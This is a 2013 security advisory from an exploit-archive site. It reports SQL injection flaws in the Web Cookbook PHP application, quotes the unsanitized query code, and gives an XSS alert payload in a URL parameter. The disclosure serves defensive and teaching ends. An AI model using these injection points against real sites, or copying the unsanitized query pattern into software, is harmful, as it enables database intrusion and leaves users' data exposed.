Web Cookbook SQL Injection

2013.03.14
Credit: Saadat Ullah
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Web Cookbook Multiple SQL Injection # Date: 2013/3/12 # Exploit Author: Saadat Ullah ? saadi_linux@rocketmail.com # Software Link: http://sourceforge.net/projects/webcookbook/ # Author HomePage: http://security-geeks.blogspot.com/ # Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 # SQL Injection http://localhost/cook/searchrecipe.php?sstring=[SQLi] http://localhost/cook/showtext.php?mode=[SQLi] http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient= http://localhost/cook/showtext.php?mode=[SQLi] #Proof Of Concept In showtext.php Code: $mode = $_GET["mode"]; . . showText($mode, $art);//sending $mode to a function without sanitizing it . . function showText($kategorie, $art) { initDB(); echo "<div class=\"rdisplay\">\n"; $query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry $result = mysql_query($query); . . All GET Fields Are Vuln To SQLi http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient= #p0c In searchrecipe.php $title = $_GET['title']; $prefix = $_GET['prefix']; $preparation = $_GET['preparation']; $postfix = $_GET['postfix']; $tipp = $_GET['tipp']; $ingredient = $_GET['ingredient']; . . . if ($title != "") { $sstring = "a.title LIKE '%$title%' "; } . . searchRecipe($mode, $sstring); . . In Function SearchRecipe $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title"; http://localhost/cook/searchrecipe.php?sstring=[SQLi] P0c $sstring = $_GET['sstring']; if ($sstring != "") { searchRecipe(0, $sstring); . . . $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title"; A simple Non-Presistent XSS http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient= #Independent Pakistani Security Researcher

References:

http://sourceforge.net/projects/webcookbook/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top